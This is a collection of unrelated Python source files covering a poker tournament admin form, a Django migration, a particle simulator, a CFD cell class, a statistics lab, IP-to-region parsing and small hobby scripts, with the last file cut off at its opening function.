FORMATTED_DT = lambda field: field.label(u"Date").validate(custom_validators.tournament_dt_validator(DT_FORMAT))
BUYIN = lambda field: field.label(u"Buyin")
class EditTournamentsGrid(CustomGrid):
""" Administration grid used to edit tournaments """
def __init__(self):
# Grid initialization
super(EditTournamentsGrid, self).__init__(Tournament, Tournament.all(order_by_clause=Tournament.tournament_dt)) #@UndefinedVariable
# Creation of a customized date field to edit the tournaments' date
self.append(create_date_field("formatted_tournament_dt", "tournament_dt", DT_FORMAT))
# Grid configuration
inc = [SEASON_READONLY(self.season_id), POSITION_READONLY(self.position), FORMATTED_DT(self.formatted_tournament_dt), BUYIN(self.buyin)]
self.configure(include=inc)
def post_sync(self):
# Parses the entered date and updates the model
self.model.tournament_dt = datetime.datetime.strptime(self.formatted_tournament_dt.value, DT_FORMAT).date()
# Reshuffles the tournaments so that they are still ordered by date
Season.get(self.model.season_id).reorder_tournaments()
class NewTournamentFieldSet(CustomFieldSet):
""" Administration form used to create tournaments """
def __init__(self):
# FieldSet initialization
super(NewTournamentFieldSet, self).__init__(Tournament)
# Creation of a customized date field to edit the tournament's date
self.append(create_date_field("formatted_tournament_dt", "tournament_dt", DT_FORMAT))
# FieldSet configuration
season_options = [("Saison %s (%s - %s)" %(season.id, season.start_year, season.end_year), season.id) for season in Season.all()]
inc = [SEASON(self.season, season_options), FORMATTED_DT(self.formatted_tournament_dt), BUYIN(self.buyin)]
self.configure(include=inc)
def post_sync(self):
# Parses the entered date and updates the model
self.model.tournament_dt = datetime.datetime.strptime(self.formatted_tournament_dt.value, DT_FORMAT).date()
# Appends the tournament in the end of the collection (i.e. in last position)
# The tournament should be appended to the season and not just be added to the session :
# see the collection_class used at the Season level to store tournaments
season = Season.get(self.model.season_id)
season.tournaments.append(self.model)
# Reshuffles the tournaments so that they are still ordered by date
season.reorder_tournaments()
class EditResultsGrid(Grid):
""" Administration grid used to edit tournament results """
def __init__(self):
super(EditResultsGrid, self).__init__(Result)
STATUS_OPTIONS = [(u"Présent", Result.STATUSES.P), (u"Absent", Result.STATUSES.A), (u"Peut-être", Result.STATUSES.M)]
RANK_OPTIONS = [(u"", None)] + [(formatting.append(i, formatting.to_rank), i) for i in range(1, len(User.all()))]
self.append(Field("pseudonym", value=lambda result: result.user.pseudonym))
inc = [
self.pseudonym.label(u"Joueur").readonly(),
self.status.label(u"Statut").dropdown(options=STATUS_OPTIONS),
self.buyin.label(u"Mise").validate(custom_validators.required_for([Result.STATUSES.P])).validate(custom_validators.forbidden_for([Result.STATUSES.M, Result.STATUSES.A])),
self.rank.label(u"Classement").dropdown(options=RANK_OPTIONS).validate(custom_validators.forbidden_for([Result.STATUSES.M, Result.STATUSES.A])),
self.profit.label(u"Gain").validate(custom_validators.forbidden_for([Result.STATUSES.M, Result.STATUSES.A])),
]
self.configure(include=inc) |
# Generated by Django 3.0 on 2020-01-18 03:01
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Customer',
fields=[
('identity', models.IntegerField(primary_key=True, serialize=False)),
('customer', models.CharField(max_length=20)),
('customer_phone', models.IntegerField(blank=True, null=True)),
('customer_type', models.CharField(blank=True, default='customer', max_length=200, null=True)),
('address', models.TextField(blank=True, max_length=500, null=True)),
('email', models.EmailField(max_length=100, unique=True)),
('image', models.ImageField(upload_to='customer')),
],
),
migrations.CreateModel(
name='Supplier',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=100, null=True)),
('address', models.CharField(blank=True, max_length=250, null=True)),
('phone', models.CharField(blank=True, max_length=100, null=True)),
('mobile_no', models.CharField(blank=True, max_length=100, null=True)),
],
),
migrations.CreateModel(
name='Sales',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('total_price', models.DecimalField(decimal_places=2, default=0, max_digits=10)),
('timestamp', models.DateTimeField(auto_now=True)),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posapp.Customer')),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, unique=True)),
('brand_name', models.CharField(blank=True, max_length=200, null=True)),
('price', models.IntegerField()),
('image', models.ImageField(upload_to='product')),
('supplier', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posapp.Supplier')),
],
),
migrations.CreateModel(
name='OrderItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('timestamp', models.DateTimeField(auto_now=True)),
('order', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posapp.Sales')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='posapp.Product')),
],
),
]
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
from tensorflow import lite
from tensorflow.keras import models
# In[2]:
# Parameters
keras_model_filename = 'wake_word_stop_model.h5'
tflite_filename = 'wake_word_stop_lite.tflite'
# In[3]:
# Convert model to TF Lite model
model = models.load_model(keras_model_filename)
converter = lite.TFLiteConverter.from_keras_model(model)
tflite_model = converter.convert()
open(tflite_filename, 'wb').write(tflite_model)
# In[ ]:
|
import boto.ec2
import WH
if __name__ == '__main__':
wh = WH.WH()
wh.connect()
conn = boto.ec2.connect_to_region("us-west-2")
for a in conn.get_all_addresses():
print "%s" % (a.public_ip)
|
from pyfirmata import Arduino, util
from time import sleep
def judge(x, y, z):
pin3.write(x)
pin5.write(y)
pin6.write(z)
board = Arduino('/dev/ttyS0')
pin3 = board.get_pin('d:3:p')
pin5 = board.get_pin('d:5:p')
pin6 = board.get_pin('d:6:p')
while True:
(x, y, z) = float(0, 0, 1)
judge(x, y, z)
sleep(0.2)
(x, y, z) = float(0, 1, 0)
judge(x, y, z)
sleep(0.2)
(x, y, z) = float(1, 0, 0)
judge(x, y, z)
sleep(0.2)
|
#! /usr/bin/env python
"""
Calculate the difference between an image and a video
USING:
As a command line utility:
$ FrameGrabber.py input_video frame_no output_image
As a module:
import VideoDifference
dif = VideoDifference("input_video.avi", input_image)
bg = dif.difference()
Author: Martin Humphreys
"""
from argparse import ArgumentParser
from math import floor, ceil
from skimage.io import imread
import random
import os
import re
import pickle
import scipy.io
from DataBag import DataBag
import numpy as np
# import cv2
class linear_motion:
def __init__(self, dx_mean=0, dx_std=0, dy_mean=0, dy_std=0):
self.dx_mean = dx_mean
self.dx_std = dx_std
self.dy_mean = dy_mean
self.dy_std = dy_std
def set(self, particle):
self.particle = particle
self.dx = np.random.normal(self.dx_mean, self.dx_std)
self.dy = np.random.normal(self.dy_mean, self.dy_std)
def tick(self, n):
x = self.particle.sx + (self.dx * n)
y = self.particle.sy + (self.dy * n)
return x, y
class second_order_motion:
def __init__(self, params):
self.dx_mean = params['dx_mean']
self.dx_std = params['dx_std']
self.dy_mean = params['dy_mean']
self.dy_std = params['dy_std']
self.ddx_mean = params['ddx_mean']
self.ddx_std = params['ddx_std']
self.ddy_mean = params['ddy_mean']
self.ddy_std = params['ddy_std']
def set(self, particle, n):
self.particle = particle
self.ddx = np.random.normal(self.ddx_mean, self.ddx_std)
self.ddy = np.random.normal(self.ddy_mean, self.ddy_std)
self.dx = np.random.normal(self.dx_mean, self.dx_std) + self.ddx * n
self.dy = np.random.normal(self.dy_mean, self.dy_std) + self.ddy * n
def tick(self, n):
x = self.particle.sx + (self.dx * (n - self.particle.sn)) + 0.5 * (self.ddx * (n - self.particle.sn) ** 2)
y = self.particle.sy + (self.dy * (n - self.particle.sn)) + 0.5 * (self.ddy * (n - self.particle.sn) ** 2)
return x, y
class horizontal_split_motion:
def __init__(self, params):
self.dx_mean = params['dx_mean']
self.dx_std = params['dx_std']
self.dy_mean = params['dy_mean']
self.dy_std = params['dy_std']
self.ddx_mean = params['ddx_mean']
self.ddx_std = params['ddx_std']
self.ddy_mean = params['ddy_mean']
self.ddy_std = params['ddy_std']
self.split = params['split']
self.state = 0
def set(self, particle, n):
self.particle = particle
self.ddx = np.random.normal(self.ddx_mean, self.ddx_std)
self.ddy = np.random.normal(self.ddy_mean, self.ddy_std)
self.dx = np.random.normal(self.dx_mean, self.dx_std) + self.ddx * n
self.dy = np.random.normal(self.dy_mean, self.dy_std) + self.ddy * n
try:
if self.particle.x > self.split:
self.dy = -np.abs(self.dy)
else:
self.dy = np.abs(self.dy)
except AttributeError:
pass
def tick(self, n):
prev_state = self.state
if self.particle.x > self.split:
self.dy = -np.abs(self.dy)
self.state = 1
elif self.particle.x < self.split:
self.dy = np.abs(self.dy)
self.state = -1
if self.state != prev_state:
self.particle.sn = n
self.particle.sx = self.particle.x
self.particle.sy = self.particle.y
x = self.particle.sx + (self.dx * (n - self.particle.sn)) + 0.5 * (self.ddx * (n - self.particle.sn) ** 2)
y = self.particle.sy + (self.dy * (n - self.particle.sn)) + 0.5 * (self.ddy * (n - self.particle.sn) ** 2)
return x, y
class Particle:
def __init__(self, sim, id_gen, motion_model, particle_class, class_sprites):
self.id_gen = id_gen
self.sim = sim
self.motion_model = motion_model
self.class_sprites = class_sprites
self.particle_class = particle_class
if self.particle_class == 'drop':
self.category = 1
self.area = 250
elif self.particle_class == 'sand':
self.category = 2
self.area = 100
self.gen()
def gen(self, x=None, y=None, n=None):
self.id = self.id_gen()
if n is None:
self.sn = 0
n = 0
else:
self.sn = n
self.motion_model.set(self, n)
if x is None and y is None:
self.sx = random.randint(0, self.sim.width-1)
self.sy = random.randint(0, self.sim.height-1)
elif x is None:
if self.motion_model.dx > 0:
self.sx = 0
else:
self.sx = self.sim.width-1
self.sy = y
elif y is None:
if self.motion_model.dy > 0:
self.sy = 0
else:
self.sy = self.sim.height-1
self.sx = x
self.x = self.sx
self.y = self.sy
self.sprite = random.choice(self.class_sprites)
self.sprite = None
d = {'id': self.id,
'area': self.area,
'category': self.category}
self.sim.bag.batchInsertParticle(d)
def tick(self, n):
_x, _y = self.motion_model.tick(n)
x, y = _x % self.sim.width, _y % self.sim.height
if _y != y:
y = None
self.gen(x, y, n)
elif _x != x:
x = None
self.gen(x, y, n)
else:
self.x, self.y = x, y
class Simulator:
def __init__(self, bag, verbose=True):
self.verbose = verbose
if self.verbose:
print("initializing...")
self.bag = DataBag(bag, verbose = self.verbose)
self.detection_bag = DataBag(bag.split('.')[0]+'_detection.'+bag.split('.')[1], verbose = self.verbose)
self.detection_pid = 0
self.height, self.width = (1000, 1000)
drop_num = 100
sand_num = 0
drop_params = {'dx_mean': 0,
'dx_std': 2,
'dy_mean': -10,
'dy_std': 2,
'ddx_mean': 0,
'ddx_std': 0,
'ddy_mean': 0.00,
'ddy_std': 0,
'split': 500,
}
sand_params = {'dx_mean': 0,
'dx_std': 1,
'dy_mean': 5,
'dy_std': 1,
'ddx_mean': 0,
'ddx_std': 0,
'ddy_mean': 0.05,
'ddy_std': 0,
}
self.drop_sprites = self.loadSprites('/local/scratch/mot/data/crops/noscale/training/bitumen/')[:1]
self.sand_sprites = self.loadSprites('/local/scratch/mot/data/crops/noscale/training/sand/')[:1]
if self.verbose:
print("sprites loaded...")
self.particles = []
def counter(first = 1):
current = [first - 1]
def next():
current[0] += 1
return current[0]
return next
id_gen = counter()
for n in range(drop_num):
motion_model = horizontal_split_motion(drop_params)
p = Particle(self, id_gen, motion_model, 'drop', self.drop_sprites)
self.particles.append(p)
for n in range(sand_num):
motion_model = horizontal_split_motion(sand_params)
p = Particle(self, id_gen, motion_model, 'sand', self.sand_sprites)
self.particles.append(p)
if self.verbose:
print("particle selection complete...")
def loadSprites(self, folder):
sprites = []
files = os.listdir(folder)
for sfile in files:
sprite = imread(folder + "/" + sfile, as_grey=True)
sprites.append(sprite)
return sprites
def updateDataBag(self, n):
for p in self.particles:
crop = p.sprite
d = {'frame': n,
'particle': p.id,
'x': p.x,
'y': p.y,
'crop': crop}
self.bag.batchInsertAssoc(d)
d = {'id': self.detection_pid,
'area': p.area,
'category': p.category}
self.detection_bag.batchInsertParticle(d)
d = {'frame': n,
'particle': self.detection_pid,
'x': p.x,
'y': p.y,
'crop': crop}
self.detection_bag.batchInsertAssoc(d)
self.detection_pid += 1
def gkern(self, l=5, sig=1.):
"""
creates gaussian kernel with side length l and a sigma of sig
"""
ax = np.arange(-l // 2 + 1., l // 2 + 1.)
xx, yy = np.meshgrid(ax, ax)
kernel = np.exp(-(xx**2 + yy**2) / (2. * sig**2))
return kernel / np.sum(kernel)
def generate(self, n=10):
# Chart animation
# vw = cv2.VideoWriter('/local/scratch/mot/data/videos/deepVelocity/gt_tmp5_local.avi', 0 , 24, (101, 101), False)
for n in range(n):
if self.verbose:
print("frame ", n, ' ...')
[p.tick(n) for p in self.particles]
# self.particles = [p for p in self.particles if p.alive]
self.updateDataBag(n)
d = {'number': n}
self.bag.batchInsertFrame(d)
'''
For a chart:
Draw the probability curve to video
'''
# dy mean + ddy mean * time
roll = int(-10 + 0.05 * n)
# vw.write(np.uint8(255*np.roll(self.gkern(101, 2)/np.max(self.gkern(101,2)), roll, axis=0)))
# vw.release()
self.bag.commit()
self.detection_bag.commit() |
import random
import time
import sklearn.linear_model as lm
from scipy.stats import f, t
from functools import partial
from pyDOE2 import *
from beautifultable import BeautifulTable
# Гутов Віталій
# Варіант 108:
# x1_min = -5, x1_max = 7,
# x2_min = -10, x2_max = 3,
# x3_min = -7, x3_max = 1
# y_min = 200 + xc_min
# y_max = 200 + xc_max
def plan_matrix(n, m):
y = np.zeros(shape=(n, m))
for i in range(n):
for j in range(m):
y[i][j] = random.randint(y_min, y_max)
if n > 14:
no = n - 14
else:
no = 1
x_norm = ccdesign(3, center=(0, no))
x_norm = np.insert(x_norm, 0, 1, axis=1)
for i in range(4, 11):
x_norm = np.insert(x_norm, i, 0, axis=1)
l = 1.215
for i in range(len(x_norm)):
for j in range(len(x_norm[i])):
if x_norm[i][j] < -1 or x_norm[i][j] > 1:
if x_norm[i][j] < 0:
x_norm[i][j] = -l
else:
x_norm[i][j] = l
def add_sq_nums(x):
for i in range(len(x)):
x[i][4] = x[i][1] * x[i][2]
x[i][5] = x[i][1] * x[i][3]
x[i][6] = x[i][2] * x[i][3]
x[i][7] = x[i][1] * x[i][3] * x[i][2]
x[i][8] = x[i][1] ** 2
x[i][9] = x[i][2] ** 2
x[i][10] = x[i][3] ** 2
return x
x_norm = add_sq_nums(x_norm)
x = np.ones(shape=(len(x_norm), len(x_norm[0])), dtype=np.int64)
for i in range(8):
for j in range(1, 4):
if x_norm[i][j] == -1:
x[i][j] = x_range[j - 1][0]
else:
x[i][j] = x_range[j - 1][1]
for i in range(8, len(x)):
for j in range(1, 3):
x[i][j] = (x_range[j - 1][0] + x_range[j - 1][1]) / 2
dx = [x_range[i][1] - (x_range[i][0] + x_range[i][1]) / 2 for i in range(3)]
x[8][1] = l * dx[0] + x[9][1]
x[9][1] = -l * dx[0] + x[9][1]
x[10][2] = l * dx[1] + x[9][2]
x[11][2] = -l * dx[1] + x[9][2]
x[12][3] = l * dx[2] + x[9][3]
x[13][3] = -l * dx[2] + x[9][3]
x = add_sq_nums(x)
x_table = BeautifulTable()
for i in range(n):
x_table.rows.append([*x[i]])
print('x matrix:')
print(x_table)
x_norm_table = BeautifulTable()
for i in range(n):
x_norm_table.rows.append([*x_norm[i]])
print('Normalized x matrix:')
print(x_norm_table)
return x, y, x_norm
def regression(x, b):
y = sum([x[i] * b[i] for i in range(len(x))])
return y
def s_kv(y, y_aver, n, m):
res = []
for i in range(n):
s = sum([(y_aver[i] - y[i][j]) ** 2 for j in range(m)]) / m
res.append(round(s, 3))
return res
def coef_finding(x, y, norm=False):
skm = lm.LinearRegression(fit_intercept=False)
skm.fit(x, y)
b = skm.coef_
if norm == 1:
print('\nCoefficients of the regression equation with normalized x:')
else:
print('\nCoefficients of the regression equation:')
b = [round(i, 3) for i in b]
print(b)
print('\nThe result of the equation with the found coefficients:\n{}'.format(np.dot(x, b)))
return b
def kohren_kr(y, y_aver, n, m):
f1 = m - 1
f2 = n
q = 0.05
skv = s_kv(y, y_aver, n, m)
gp = max(skv) / sum(skv)
print('\nKohren check')
return gp
def kohren(f1, f2, q=0.05):
q1 = q / f1
fisher_value = f.ppf(q=1 - q1, dfn=f2, dfd=(f1 - 1) * f2)
return fisher_value / (fisher_value + f1 - 1)
def bs(x, y_aver, n):
res = [sum(1 * y for y in y_aver) / n]
for i in range(len(x[0])):
b = sum(j[0] * j[1] for j in zip(x[:, i], y_aver)) / n
res.append(b)
return res
def student_kr(x, y, y_aver, n, m):
skv = s_kv(y, y_aver, n, m)
skv_aver = sum(skv) / n
sbs_tmp = (skv_aver / n / m) ** 0.5
bs_tmp = bs(x, y_aver, n)
ts = [round(abs(b) / sbs_tmp, 3) for b in bs_tmp]
return ts
def fisher_kr(y, y_aver, y_new, n, m, d):
S_ad = m / (n - d) * sum([(y_new[i] - y_aver[i]) ** 2 for i in range(len(y))])
skv = s_kv(y, y_aver, n, m)
skv_aver = sum(skv) / n
return S_ad / skv_aver
def check(x, y, b, n, m):
print('\nCheck the equation:')
f1 = m - 1
f2 = n
f3 = f1 * f2
q = 0.05
student = partial(t.ppf, q=1 - q)
t_student = student(df=f3)
g_kr = kohren(f1, f2)
y_aver = [round(sum(i) / len(i), 3) for i in y]
print('\nThe average value of y:', y_aver)
disp = s_kv(y, y_aver, n, m)
print('The variance y:', disp)
begin_time = time.perf_counter()
gp = kohren_kr(y, y_aver, n, m)
end_time = time.perf_counter()
counted_kohren = end_time - begin_time
print(f'gp = {gp}')
if gp < g_kr:
print('With a probability of {} dispersions are homogeneous.'.format(1 - q))
else:
print("It is necessary to increase the number of experiments")
m += 1
main(n, m)
begin_time = time.perf_counter()
ts = student_kr(x[:, 1:], y, y_aver, n, m)
end_time = time.perf_counter()
counted_stud = end_time - begin_time
print('\nStudent criterion:\n{}:'.format(ts))
res = [t for t in ts if t > t_student]
final_k = [b[i] for i in range(len(ts)) if ts[i] in res]
print('\nThe coefficients {} are statistically insignificant, so we exclude them from the equation.'.format([round(i, 3) for i in b if i not in final_k]))
y_new = []
for j in range(n):
y_new.append(round(regression([x[j][i] for i in range(len(ts)) if ts[i] in res], final_k), 3))
print('The value of y with coefficients {}: '.format(final_k))
print(y_new)
d = len(res)
if d >= n:
print('\nF4 <= 0')
print('')
return
f4 = n - d
begin_time = time.perf_counter()
f_p = fisher_kr(y, y_aver, y_new, n, m, d)
end_time = time.perf_counter()
counted_fish = end_time - begin_time
fisher = partial(f.ppf, q=0.95)
f_t = fisher(dfn=f4, dfd=f3)
print('\nFisher adequacy check')
print('fp =', f_p)
print('ft =', f_t)
if f_p < f_t:
print('The mathematical model is adequate to the experimental data')
else:
print('The mathematical model is inadequate to the experimental data')
print('\nTime of statistical checks\nkohren - {} seconds\nstudent - {} seconds\nfisher - {} seconds'
.format(counted_kohren, counted_stud, counted_fish))
def main(n, m):
x, y, x_norm = plan_matrix(n, m)
y5_aver = [round(sum(i) / len(i), 3) for i in y]
b = coef_finding(x, y5_aver)
check(x_norm, y, b, n, m)
x_range = ((-5, 7), (-10, 3), (-7, 1))
x_aver_max = sum([x[1] for x in x_range]) / 3
x_aver_min = sum([x[0] for x in x_range]) / 3
y_min = 200 + int(x_aver_min)
y_max = 200 + int(x_aver_max)
main(15, 3)
|
import json
import csv
import pprint
pp = pprint.PrettyPrinter(indent=2, depth=8)
with open('college_data.json', 'r') as j:
json_data = json.loads(j.read())
#pp.pprint(json_data)
with open('college_data.csv', 'w') as c:
csv_file = csv.writer(c)
for data in json_data:
csv_file.writerow([data['institution']['displayName'],
data['ranking']['displayRank'],
data['searchData']['acceptance-rate']['rawValue']])
|
"""
Base element of the solver. Each Cell object is a control volume and all the elementary operations
are performed at this level.
"""
import numpy as np
from qod_fvm import utils
utils.plt_style()
N_TRANSPORT_EQ = 3
class Cell():
"""
Control volume object
"""
def __init__(self):
"""Cell constructor"""
# Cell size [m]
self.dx = 0.
# Cell position
self.x_i = 0.
# area
self.diam = 0.
self.area = 0.
# Left face position
self.x_f_0 = 0.
# right face position
self.x_f_1 = 0.
# How does area and volume work?
self.vol = 0.
# Do we have trapezoidal elements?
self.normal_l = -1.
self.normal_r = 1.
# variables
self.pres = 0.
self.temp = 0.
self.e_int = 0.
self.e_tot = 0.
self.u = 0.
# self.cp = 0.
self.gamma = 0.
self.r_gas = 0.
# cons
self.rho = 0.
self.rho_u = 0.
self.rho_E = 0.
# index of vector
self.idx_mass = 0
self.idx_momentum = 1
self.idx_energy = 2
# cons_vec
self.w_cons = np.zeros(N_TRANSPORT_EQ)
# source term
self.s_cons = np.zeros(N_TRANSPORT_EQ)
# Flux vector
# cell-center
self.f_cons = np.zeros(N_TRANSPORT_EQ)
# left
self.flux_face_l = np.zeros(N_TRANSPORT_EQ)
# right
self.flux_face_r = np.zeros(N_TRANSPORT_EQ)
self.n_transport_eq = N_TRANSPORT_EQ
def compute_volume(self):
"""Compute and set the volume of the CV"""
self.vol = self.area * self.dx
def set_positions(self, x_minus_half, x_center, x_plus_half):
"""
Initialize the position of the cell center, the faces and the size of the cell
:param x_minus_half: [m]
:param x_center: [m]
:param x_plus_half: [m]
"""
self.x_i = x_center
self.x_f_0 = x_minus_half
self.x_f_1 = x_plus_half
self.dx = self.x_f_1 - self.x_f_0
def get_T(self):
"""
Get temperature
:return: temperature [K]
"""
return self.temp
def get_P(self):
"""
Get Pressure
:return: pressure [Pa]
"""
return self.pres
def get_u(self):
"""
Get axial velocity
:return: velocity [m/s]
"""
return self.u
def get_rhou(self):
"""
Get rhou
:return: rho [kg.m-2.s-1]
"""
return self.rho_u
def set_T(self, temperature):
"""
Set the temperature
:param temperature: temperature [K]
"""
self.temp = temperature
def set_P(self, pressure):
"""
Set the pressure
:param pressure: pressure [Pa]
"""
self.pres = pressure
def set_u(self, u):
"""
Set the axial velocity
:param u: axial velocity [m/s]
"""
self.u = u
def set_rho_from_TP(self, temp=None, pres=None):
"""
Set the density [kg/m^3] from the temperature [K] and pressure [Pa] from the ideal gas law.
"""
if not temp:
temp = self.temp
else:
self.temp = temp
if not pres:
pres = self.pres
else:
self.pres = pres
self.rho = pres / (self.r_gas * temp)
def set_T_from_RP(self):
"""
Set the temperature [K] from the density and the pressure (Ideal gas law)
"""
self.temp = self.pres / (self.r_gas * self.rho)
def get_cp(self):
"""
Get the specific heat capacity [J/K/kg] at constant pressure
:return: c_p [J/K/kg]
"""
return self.gamma * self.get_cv()
def get_cv(self):
"""
Get the specific heat capacity [J/K/kg] at constant volume
:return: c_v [J/K/kg]
"""
return self.r_gas / (self.gamma - 1.)
def get_enthalpy(self):
"""
Compute and return the specific sensible enthalpy [J/kg].
For a calorically perfect gas, the sensible enthalpy is computed as:
.. math::
h = c_p T
:return: enthalpy [J/kg]
"""
_h = self.get_cp() * self.temp
return _h
def get_internal_energy(self):
"""
Compute and return the internal specific energy [J/kg]. This is computed from the enthalpy:
.. math::
e_{int} = h - \\frac{p}{\\rho}
:return: internal specific energy [J/kg]
"""
_h = self.get_enthalpy()
self.e_int = _h - self.pres / self.rho
return self.e_int
def get_total_energy(self):
"""
Compute and returns total energy [J/kg].
.. math::
e_{tot} = e_{int} + \\frac{u^2}{2} = h - \\frac{p}{\\rho} + \\frac{u^2}{2}
:return: total specific energy [J/kg]
"""
self.e_tot = self.get_internal_energy() + 0.5 * self.u ** 2
return self.e_tot
def get_sos(self):
"""
Computes and returns speed of sound [m/s]. An assertion is made on the positivity of this
quantity.
.. math::
a = \\sqrt{\\gamma r T}
:return: local speed of sound
"""
sos = np.sqrt(self.gamma * self.r_gas * self.temp)
if self.temp < 0.:
print("Problem, negative speed of sound here:")
output_fields = self.get_outfield()
output_fields['x'] = self.x_i
for key, value in output_fields.items():
print("\t %s\t:\t%e" % (key, value))
assert (sos > 0)
return sos
def update_cons_vec(self):
"""
Fill the vector of conservative variables:
.. math::
U[0] = \\rho
U[1] = \\rho u
U[2] = \\rho E
"""
self.w_cons[self.idx_mass] = self.rho
self.w_cons[self.idx_momentum] = self.rho_u
self.w_cons[self.idx_energy] = self.rho_E
def update_flux_vec(self):
"""
Fill the vector of fluxes.
.. math::
F[0] = \\rho u
F[1] = \\rho u^2 + p
F[2] = u (\\rho E + p)
"""
self.f_cons[self.idx_mass] = self.rho_u
self.f_cons[self.idx_momentum] = self.rho * self.u ** 2.# + self.pres
self.f_cons[self.idx_energy] = self.u * (self.rho_E + self.pres)
# self.f_cons[self.idx_energy] = self.u * (self.rho_E)
# self.f_cons *= self.area
def prim_to_cons(self):
"""
Convert primitive variables to conservative variables.
Careful, at this point the conservative vector isn't necessary update yet.
You should do it manually by calling `update_vec_from_var`.
"""
# Mass
# no need, rho is prim and cons
# Momentum
self.rho_u = self.rho * self.u
# Energy
self.rho_E = self.rho * self.get_total_energy()
def cons_to_prim(self):
"""
Retrieve primitive variables from conservative vector
.. math::
E = e_i + \\frac{u^2}{2} = h - \\frac{p}{\\rho} - \\frac{u^2}{2} = \\frac{1}{\\gamma - 1} \\frac{p}{\\rho} + \\frac{u^2}{2}
.. math::
p = \\rho (\\gamma - 1) \\left( E + \\frac{u^2}{2} \\right)
"""
# verify this
# mass, ok
self.rho = self.w_cons[0] #/ self.area
# momentum
self.u = self.w_cons[1] / self.rho #/ self.area
# energy
self.e_tot = self.w_cons[2] / self.rho # / self.area
# pressure
self.pres = (self.gamma - 1.) * self.rho * (self.e_tot - 0.5 * self.u ** 2.)
# Temperature
self.set_T_from_RP()
# e_int
_ = self.get_internal_energy()
def update_vec_from_var(self):
"""
Update conservative and flux vectors. First converts primitive variables to conservative
then fill vectors.
"""
self.prim_to_cons()
self.update_cons_vec()
self.update_flux_vec()
def update_var_from_vec(self):
"""
Converts conservative variables to primitives
"""
self.cons_to_prim()
def get_outfield(self):
output_fields = {}
tmp = self.get_u()
output_fields['vel-x'] = tmp
tmp = self.gamma
output_fields['gamma'] = tmp
tmp = self.r_gas
output_fields['R_GAS'] = tmp
tmp = self.rho_E
output_fields['rhoE'] = tmp
tmp = self.rho
output_fields['rho'] = tmp
tmp = self.pres
output_fields['P'] = tmp
tmp = self.temp
output_fields['T'] = tmp
tmp = self.rho_u
output_fields['rhou'] = tmp
tmp = self.dx
output_fields['dx'] = tmp
output_fields['A'] = tmp
tmp = self.area
return output_fields
|
import re
import socket
import struct as ip_struct
import traceback
from ctutil import iputil
def ipaddr_handle(ipv4, ipv6):
'''
udf处理入口
:param ipv4: str ipv4地址
:param ipv6: str ipv6地址
:return: bigint iplog
'''
if not iputil.is_ipv4(ipv4):
return 0
return iputil.ip2long(ipv4)
def address_split(address):
'''
udf处理入口
:param address: str 详细地址
:return: (province_name, city_name, district_name)
'''
if not address:
return None, None, None
chartered_cities = ["北京", "上海", "天津", "重庆", "香港", "澳门"]
for city in chartered_cities:
if city in address:
address = address.replace(city, city + "省" + city, 1)
break
split_items = ['省', '市', '特别行政区', '自治区',
'自治县', '县区', '区县', '县', '区', '旗', '市']
items = []
addr_tmp = address
for item in split_items:
if item in addr_tmp:
addr_tmp_ = addr_tmp.replace(item, ",", 1)
items_ = addr_tmp_.split(',')
items.append(items_[0])
addr_tmp = items_[1]
items.append(addr_tmp)
if len(items) >= 3:
return items[0], items[1], items[2]
if len(items) >= 2:
return items[0], items[1], None
return None, None, None
def areaname_handle(area_name):
if not area_name:
return area_name
split_items = ['省', '市', '自治区', '自治县', '特别行政区', '县区', '区县', '县', '区', '旗']
for item in split_items:
if area_name.endswith(item):
return area_name[:-1 * len(item)]
return area_name
def ip2area(iplong, ips_source):
ips = ips_source
def bst_search(array, index_l, index_r, value):
if index_l == index_r:
return None
index = int((index_l + index_r) / 2)
index_pre = index - 1 if index - 1 >= 0 else 0
index_next = index + 1 if index + \
1 <= len(array) - 1 else len(array) - 1
if array[index][0] <= value:
if array[index_next][0] >= value:
return array[index_next]
return bst_search(array, index + 1, index_r, value)
else:
if array[index_pre][0] <= value:
return array[index]
return bst_search(array, index_l, index, value)
area_info = bst_search(ips, 0, len(ips) - 1, iplong)
if area_info:
return [
area_info[1],
area_info[2],
area_info[3],
area_info[4],
None,
None
]
return [
None,
None,
None,
None,
None,
None
]
def handle(address, group_id, ipv4, ipv6, ips_source, region_source, group_source):
'''解析地区'''
if group_id and group_id > 0:
area_info = group_source.get(group_id)
if area_info and area_info[2] and int(area_info[2]) > 0:
return [
area_info[0],
area_info[1],
area_info[2],
area_info[3],
area_info[4],
area_info[5]
]
if address:
region = region_source
province_name, city_name, district_name = address_split(address)
area_info = region.get("{}_{}_{}".format(
province_name, city_name, district_name))
if area_info:
return [
area_info["province_code"],
area_info["province_name"],
area_info["city_code"],
area_info["city_name"],
area_info["district_code"],
area_info["district_name"]
]
area_info = region.get("{}_{}".format(province_name, city_name))
if area_info:
return [
area_info["province_code"],
area_info["province_name"],
area_info["city_code"],
area_info["city_name"],
None,
None
]
if isinstance(ipv4, str) and iputil.is_ipv4(ipv4):
area_info = ip2area(iputil.ip2long(ipv4), ips_source)
if area_info:
return area_info
return [
None,
None,
None,
None,
None,
None
]
|
import dog
myDog = dog.Dog("rex", "superdog")
myDog.bark()
mySecondDog = dog.Dog("sebastian", "rollingdog")
myThirdDog = dog.Dog("jennifer", "sittingdog")
myFourthDog = dog.Dog("ophelia", "runningdog")
mySecondDog.rollover() #sebastian will roll over
myThirdDog.sit() #jennifer will sit
myFourthDog.run() #ophelia will run
print(" ")
dog.greeting = "woah!"
myDog.bark()
mySecondDog.bark()
myThirdDog.bark()
myFourthDog.bark()
|
#!/usr/bin/python3
# functions.py by Bill Weinman [http://bw.org/]
# This is an exercise file from Python 3 Essential Training on lynda.com
# Copyright 2010 The BearHeart Group, LLC
def main():
